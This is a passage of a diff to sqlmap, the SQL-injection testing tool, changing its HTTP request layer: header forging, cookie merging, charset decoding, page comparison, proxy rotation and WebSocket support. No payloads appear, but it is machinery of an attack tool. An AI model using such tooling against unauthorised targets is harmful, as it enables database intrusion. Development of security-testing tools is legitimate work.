|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
|
||||||
def forgeHeaders(items=None):
|
def forgeHeaders(items=None):
|
||||||
"""
|
"""
|
||||||
|
@ -50,10 +52,36 @@ def forgeHeaders(items=None):
|
||||||
if items[_] is None:
|
if items[_] is None:
|
||||||
del items[_]
|
del items[_]
|
||||||
|
|
||||||
headers = dict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
headers.update(items or {})
|
headers.update(items.items())
|
||||||
|
|
||||||
headers = dict(("-".join(_.capitalize() for _ in key.split('-')), value) for (key, value) in headers.items())
|
class _str(str):
|
||||||
|
def capitalize(self):
|
||||||
|
return _str(self)
|
||||||
|
|
||||||
|
def title(self):
|
||||||
|
return _str(self)
|
||||||
|
|
||||||
|
_ = headers
|
||||||
|
headers = OrderedDict()
|
||||||
|
for key, value in _.items():
|
||||||
|
success = False
|
||||||
|
|
||||||
|
for _ in headers:
|
||||||
|
if _.upper() == key.upper():
|
||||||
|
del headers[_]
|
||||||
|
break
|
||||||
|
|
||||||
|
if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
|
||||||
|
try:
|
||||||
|
headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455
|
||||||
|
except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on)
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
success = True
|
||||||
|
if not success:
|
||||||
|
key = '-'.join(_.capitalize() for _ in key.split('-'))
|
||||||
|
headers[key] = value
|
||||||
|
|
||||||
if conf.cj:
|
if conf.cj:
|
||||||
if HTTP_HEADER.COOKIE in headers:
|
if HTTP_HEADER.COOKIE in headers:
|
||||||
|
@ -72,8 +100,8 @@ def forgeHeaders(items=None):
|
||||||
_ = readInput(message, default="Y")
|
_ = readInput(message, default="Y")
|
||||||
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
||||||
|
|
||||||
if kb.mergeCookies:
|
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
||||||
_ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, cookie.value), x)
|
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||||
|
|
||||||
if PLACE.COOKIE in conf.parameters:
|
if PLACE.COOKIE in conf.parameters:
|
||||||
|
@ -82,9 +110,9 @@ def forgeHeaders(items=None):
|
||||||
conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]
|
conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]
|
||||||
|
|
||||||
elif not kb.testMode:
|
elif not kb.testMode:
|
||||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value)
|
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
||||||
|
|
||||||
if kb.testMode:
|
if kb.testMode and not conf.csrfToken:
|
||||||
resetCookieJar(conf.cj)
|
resetCookieJar(conf.cj)
|
||||||
|
|
||||||
return headers
|
return headers
|
||||||
|
@ -120,7 +148,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||||
return encoding
|
return encoding
|
||||||
|
|
||||||
# Reference: http://www.destructor.de/charsets/index.htm
|
# Reference: http://www.destructor.de/charsets/index.htm
|
||||||
translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1"}
|
translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
|
||||||
|
|
||||||
for delimiter in (';', ',', '('):
|
for delimiter in (';', ',', '('):
|
||||||
if delimiter in encoding:
|
if delimiter in encoding:
|
||||||
|
@ -137,8 +165,8 @@ def checkCharEncoding(encoding, warn=True):
|
||||||
encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859
|
encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859
|
||||||
elif "2313" in encoding:
|
elif "2313" in encoding:
|
||||||
encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312
|
encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312
|
||||||
elif "x-euc" in encoding:
|
elif encoding.startswith("x-"):
|
||||||
encoding = encoding.replace("x-euc", "euc") # x-euc-kr -> euc-kr
|
encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish
|
||||||
elif "windows-cp" in encoding:
|
elif "windows-cp" in encoding:
|
||||||
encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254
|
encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254
|
||||||
|
|
||||||
|
@ -173,7 +201,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||||
except LookupError:
|
except LookupError:
|
||||||
if warn:
|
if warn:
|
||||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
warnMsg = "unknown web page charset '%s'. " % encoding
|
||||||
warnMsg += "Please report by e-mail to %s." % ML
|
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
|
||||||
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
||||||
encoding = None
|
encoding = None
|
||||||
|
|
||||||
|
@ -236,7 +264,7 @@ def decodePage(page, contentEncoding, contentType):
|
||||||
|
|
||||||
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
||||||
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
||||||
kb.pageEncoding = httpCharset or metaCharset
|
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
||||||
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
||||||
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
||||||
else:
|
else:
|
||||||
|
@ -246,39 +274,45 @@ def decodePage(page, contentEncoding, contentType):
|
||||||
|
|
||||||
# can't do for all responses because we need to support binary files too
|
# can't do for all responses because we need to support binary files too
|
||||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
||||||
# e.g. Ãëàâà
|
if kb.heuristicMode:
|
||||||
if "&#" in page:
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
page = getUnicode(page, kb.pageEncoding)
|
||||||
|
else:
|
||||||
|
# e.g. Ãëàâà
|
||||||
|
if "&#" in page:
|
||||||
|
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||||
|
|
||||||
# e.g. %20%28%29
|
# e.g. %20%28%29
|
||||||
if "%" in page:
|
if "%" in page:
|
||||||
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
||||||
|
|
||||||
# e.g. &
|
# e.g. &
|
||||||
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
||||||
|
|
||||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
page = getUnicode(page, kb.pageEncoding)
|
page = getUnicode(page, kb.pageEncoding)
|
||||||
|
|
||||||
# e.g. ’…™
|
# e.g. ’…™
|
||||||
if "&#" in page:
|
if "&#" in page:
|
||||||
def _(match):
|
def _(match):
|
||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
try:
|
try:
|
||||||
retVal = unichr(int(match.group(1)))
|
retVal = unichr(int(match.group(1)))
|
||||||
except ValueError:
|
except ValueError:
|
||||||
pass
|
pass
|
||||||
return retVal
|
return retVal
|
||||||
page = re.sub(r"&#(\d+);", _, page)
|
page = re.sub(r"&#(\d+);", _, page)
|
||||||
|
|
||||||
# e.g. ζ
|
# e.g. ζ
|
||||||
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
||||||
|
|
||||||
return page
|
return page
|
||||||
|
|
||||||
def processResponse(page, responseHeaders):
|
def processResponse(page, responseHeaders):
|
||||||
kb.processResponseCounter += 1
|
kb.processResponseCounter += 1
|
||||||
|
|
||||||
|
page = page or ""
|
||||||
|
|
||||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
||||||
|
|
||||||
if conf.parseErrors:
|
if conf.parseErrors:
|
||||||
|
@ -297,3 +331,7 @@ def processResponse(page, responseHeaders):
|
||||||
continue
|
continue
|
||||||
conf.paramDict[PLACE.POST][name] = value
|
conf.paramDict[PLACE.POST][name] = value
|
||||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
|
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
|
||||||
|
|
||||||
|
if re.search(BLOCKED_IP_REGEX, page):
|
||||||
|
errMsg = "it appears that you have been blocked by the target server"
|
||||||
|
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -90,7 +90,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||||
|
|
||||||
if kb.nullConnection and pageLength:
|
if kb.nullConnection and pageLength:
|
||||||
if not seqMatcher.a:
|
if not seqMatcher.a:
|
||||||
errMsg = "problem occured while retrieving original page content "
|
errMsg = "problem occurred while retrieving original page content "
|
||||||
errMsg += "which prevents sqlmap from continuation. Please rerun, "
|
errMsg += "which prevents sqlmap from continuation. Please rerun, "
|
||||||
errMsg += "and if the problem persists turn off any optimization switches"
|
errMsg += "and if the problem persists turn off any optimization switches"
|
||||||
raise SqlmapNoneDataException(errMsg)
|
raise SqlmapNoneDataException(errMsg)
|
||||||
|
@ -132,8 +132,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||||
seq1 = seq1[count:]
|
seq1 = seq1[count:]
|
||||||
seq2 = seq2[count:]
|
seq2 = seq2[count:]
|
||||||
|
|
||||||
seqMatcher.set_seq1(seq1)
|
while True:
|
||||||
seqMatcher.set_seq2(seq2)
|
try:
|
||||||
|
seqMatcher.set_seq1(seq1)
|
||||||
|
except MemoryError:
|
||||||
|
seq1 = seq1[:len(seq1) / 1024]
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
seqMatcher.set_seq2(seq2)
|
||||||
|
except MemoryError:
|
||||||
|
seq2 = seq2[:len(seq2) / 1024]
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||||
|
|
||||||
|
|
|
@ -1,20 +1,30 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import compiler
|
||||||
import httplib
|
import httplib
|
||||||
import json
|
import json
|
||||||
|
import keyword
|
||||||
import logging
|
import logging
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
import string
|
import string
|
||||||
|
import struct
|
||||||
import time
|
import time
|
||||||
|
import traceback
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
import traceback
|
|
||||||
|
try:
|
||||||
|
import websocket
|
||||||
|
from websocket import WebSocketException
|
||||||
|
except ImportError:
|
||||||
|
class WebSocketException(Exception):
|
||||||
|
pass
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safecharencode
|
from extra.safe2bin.safe2bin import safecharencode
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
|
@ -22,10 +32,12 @@ from lib.core.common import asciifyUrl
|
||||||
from lib.core.common import calculateDeltaSeconds
|
from lib.core.common import calculateDeltaSeconds
|
||||||
from lib.core.common import clearConsoleLine
|
from lib.core.common import clearConsoleLine
|
||||||
from lib.core.common import cpuThrottle
|
from lib.core.common import cpuThrottle
|
||||||
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import evaluateCode
|
from lib.core.common import evaluateCode
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import findMultipartPostBoundary
|
from lib.core.common import findMultipartPostBoundary
|
||||||
from lib.core.common import getCurrentThreadData
|
from lib.core.common import getCurrentThreadData
|
||||||
|
from lib.core.common import getHeader
|
||||||
from lib.core.common import getHostHeader
|
from lib.core.common import getHostHeader
|
||||||
from lib.core.common import getRequestHeader
|
from lib.core.common import getRequestHeader
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
@ -61,12 +73,16 @@ from lib.core.enums import REDIRECTION
|
||||||
from lib.core.enums import WEB_API
|
from lib.core.enums import WEB_API
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapTokenException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
||||||
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
|
||||||
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
||||||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||||
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
||||||
|
@ -79,6 +95,8 @@ from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import PERMISSION_DENIED_REGEX
|
from lib.core.settings import PERMISSION_DENIED_REGEX
|
||||||
from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE
|
from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE
|
||||||
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
|
from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
|
||||||
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
||||||
from lib.core.settings import URI_HTTP_HEADER
|
from lib.core.settings import URI_HTTP_HEADER
|
||||||
from lib.core.settings import WARN_TIME_STDEV
|
from lib.core.settings import WARN_TIME_STDEV
|
||||||
|
@ -88,8 +106,9 @@ from lib.request.basic import processResponse
|
||||||
from lib.request.direct import direct
|
from lib.request.direct import direct
|
||||||
from lib.request.comparison import comparison
|
from lib.request.comparison import comparison
|
||||||
from lib.request.methodrequest import MethodRequest
|
from lib.request.methodrequest import MethodRequest
|
||||||
from thirdparty.socks.socks import ProxyError
|
|
||||||
from thirdparty.multipart import multipartpost
|
from thirdparty.multipart import multipartpost
|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
from thirdparty.socks.socks import ProxyError
|
||||||
|
|
||||||
|
|
||||||
class Connect(object):
|
class Connect(object):
|
||||||
|
@ -106,6 +125,13 @@ class Connect(object):
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
threadData.retriesCount += 1
|
threadData.retriesCount += 1
|
||||||
|
|
||||||
|
if conf.proxyList and threadData.retriesCount >= conf.retries:
|
||||||
|
warnMsg = "changing proxy"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
conf.proxy = None
|
||||||
|
setHTTPProxy()
|
||||||
|
|
||||||
if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
|
if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
|
||||||
# timed based payloads can cause web server unresponsiveness
|
# timed based payloads can cause web server unresponsiveness
|
||||||
# if the injectable piece of code is some kind of JOIN-like query
|
# if the injectable piece of code is some kind of JOIN-like query
|
||||||
|
@ -148,7 +174,7 @@ class Connect(object):
|
||||||
|
|
||||||
if not kb.dnsMode and conn:
|
if not kb.dnsMode and conn:
|
||||||
headers = conn.info()
|
headers = conn.info()
|
||||||
if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
||||||
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||||
|
@ -181,13 +207,13 @@ class Connect(object):
|
||||||
the target URL page content
|
the target URL page content
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
||||||
time.sleep(conf.delay)
|
time.sleep(conf.delay)
|
||||||
elif conf.cpuThrottle:
|
elif conf.cpuThrottle:
|
||||||
cpuThrottle(conf.cpuThrottle)
|
cpuThrottle(conf.cpuThrottle)
|
||||||
|
|
||||||
if conf.dummy:
|
if conf.dummy:
|
||||||
return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
|
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
|
||||||
|
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
with kb.locks.request:
|
with kb.locks.request:
|
||||||
|
@ -215,6 +241,8 @@ class Connect(object):
|
||||||
crawling = kwargs.get("crawling", False)
|
crawling = kwargs.get("crawling", False)
|
||||||
skipRead = kwargs.get("skipRead", False)
|
skipRead = kwargs.get("skipRead", False)
|
||||||
|
|
||||||
|
websocket_ = url.lower().startswith("ws")
|
||||||
|
|
||||||
if not urlparse.urlsplit(url).netloc:
|
if not urlparse.urlsplit(url).netloc:
|
||||||
url = urlparse.urljoin(conf.url, url)
|
url = urlparse.urljoin(conf.url, url)
|
||||||
|
|
||||||
|
@ -248,10 +276,6 @@ class Connect(object):
|
||||||
# support those by default
|
# support those by default
|
||||||
url = asciifyUrl(url)
|
url = asciifyUrl(url)
|
||||||
|
|
||||||
# fix for known issues when using url in unicode format
|
|
||||||
# (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
|
|
||||||
url = unicodeencode(url)
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
socket.setdefaulttimeout(timeout)
|
socket.setdefaulttimeout(timeout)
|
||||||
|
|
||||||
|
@ -260,7 +284,6 @@ class Connect(object):
|
||||||
url, params = url.split('?', 1)
|
url, params = url.split('?', 1)
|
||||||
params = urlencode(params)
|
params = urlencode(params)
|
||||||
url = "%s?%s" % (url, params)
|
url = "%s?%s" % (url, params)
|
||||||
requestMsg += "?%s" % params
|
|
||||||
|
|
||||||
elif multipart:
|
elif multipart:
|
||||||
# Needed in this form because of potential circle dependency
|
# Needed in this form because of potential circle dependency
|
||||||
|
@ -291,10 +314,14 @@ class Connect(object):
|
||||||
get = urlencode(get, limit=True)
|
get = urlencode(get, limit=True)
|
||||||
|
|
||||||
if get:
|
if get:
|
||||||
url = "%s?%s" % (url, get)
|
if '?' in url:
|
||||||
requestMsg += "?%s" % get
|
url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
|
||||||
|
requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
|
||||||
|
else:
|
||||||
|
url = "%s?%s" % (url, get)
|
||||||
|
requestMsg += "?%s" % get
|
||||||
|
|
||||||
if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
|
if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
|
||||||
post = conf.parameters[PLACE.POST]
|
post = conf.parameters[PLACE.POST]
|
||||||
|
|
||||||
elif get:
|
elif get:
|
||||||
|
@ -304,7 +331,7 @@ class Connect(object):
|
||||||
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
||||||
|
|
||||||
# Prepare HTTP headers
|
# Prepare HTTP headers
|
||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
|
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
|
||||||
|
|
||||||
if kb.authHeader:
|
if kb.authHeader:
|
||||||
headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
|
headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
|
||||||
|
@ -312,11 +339,16 @@ class Connect(object):
|
||||||
if kb.proxyAuthHeader:
|
if kb.proxyAuthHeader:
|
||||||
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
||||||
|
|
||||||
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
if not getHeader(headers, HTTP_HEADER.ACCEPT):
|
||||||
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
||||||
headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
|
|
||||||
|
|
||||||
if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
|
if not getHeader(headers, HTTP_HEADER.HOST) or not target:
|
||||||
|
headers[HTTP_HEADER.HOST] = getHostHeader(url)
|
||||||
|
|
||||||
|
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
|
||||||
|
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
||||||
|
|
||||||
|
if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
||||||
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
||||||
|
|
||||||
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
|
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
|
||||||
|
@ -330,71 +362,101 @@ class Connect(object):
|
||||||
|
|
||||||
if auxHeaders:
|
if auxHeaders:
|
||||||
for key, item in auxHeaders.items():
|
for key, item in auxHeaders.items():
|
||||||
|
for _ in headers.keys():
|
||||||
|
if _.upper() == key.upper():
|
||||||
|
del headers[_]
|
||||||
headers[key] = item
|
headers[key] = item
|
||||||
|
|
||||||
for key, item in headers.items():
|
for key, item in headers.items():
|
||||||
del headers[key]
|
del headers[key]
|
||||||
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
|
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
|
||||||
|
|
||||||
|
url = unicodeencode(url)
|
||||||
post = unicodeencode(post, kb.pageEncoding)
|
post = unicodeencode(post, kb.pageEncoding)
|
||||||
|
|
||||||
if method:
|
if websocket_:
|
||||||
req = MethodRequest(url, post, headers)
|
ws = websocket.WebSocket()
|
||||||
req.set_method(method)
|
ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically
|
||||||
|
ws.send(urldecode(post or ""))
|
||||||
|
page = ws.recv()
|
||||||
|
ws.close()
|
||||||
|
code = ws.status
|
||||||
|
status = httplib.responses[code]
|
||||||
|
class _(dict):
|
||||||
|
pass
|
||||||
|
responseHeaders = _(ws.getheaders())
|
||||||
|
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||||
|
|
||||||
|
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
|
||||||
|
requestMsg += "\n%s" % requestHeaders
|
||||||
|
|
||||||
|
if post is not None:
|
||||||
|
requestMsg += "\n\n%s" % getUnicode(post)
|
||||||
|
|
||||||
|
requestMsg += "\n"
|
||||||
|
|
||||||
|
threadData.lastRequestMsg = requestMsg
|
||||||
|
|
||||||
|
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
||||||
else:
|
else:
|
||||||
req = urllib2.Request(url, post, headers)
|
if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
|
||||||
|
method = unicodeencode(method)
|
||||||
|
req = MethodRequest(url, post, headers)
|
||||||
|
req.set_method(method)
|
||||||
|
else:
|
||||||
|
req = urllib2.Request(url, post, headers)
|
||||||
|
|
||||||
requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
|
